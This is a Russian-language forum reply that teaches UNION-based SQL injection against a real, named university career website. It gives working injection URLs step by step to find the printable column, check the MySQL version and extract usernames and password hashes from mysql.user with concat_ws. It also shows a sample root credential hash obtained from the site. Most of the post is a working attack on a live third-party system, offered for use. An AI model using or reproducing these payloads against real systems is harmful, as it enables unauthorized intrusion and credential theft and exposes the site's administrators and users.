wildshaman, мб мы не будем флудить??
Сообщение от
jecka3000
Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?
Возьмём за пример твою же скулю, тоторую ты выклодовал:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Мы видим что принтабельный столбец - 2
Проверим версию БД выполнив команду version()
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+from+mysql.user/*
получаем:
Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA
Но изучив бд mysql мы уже знаем, что там присутствуют колонки user и password
Имея эти даные мы составляем следующие запрос к базе данных:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mysql.user/*
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from+mysql.user/*
Но ведь не удобно состовлять несколько запросов, не так ди?
Для этого можно использовать функцию concat() или concat_ws()
Пример:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11+from+mysql.user/*
И получить всё и сразу:
Код:
root:0e420e231935eccd
0x3a - это двоеточие в хексе!
##################################
Для начала посоветую тебе почитать литературу по php и sql.
После чего можешь приступать к чтению статтей по sql inj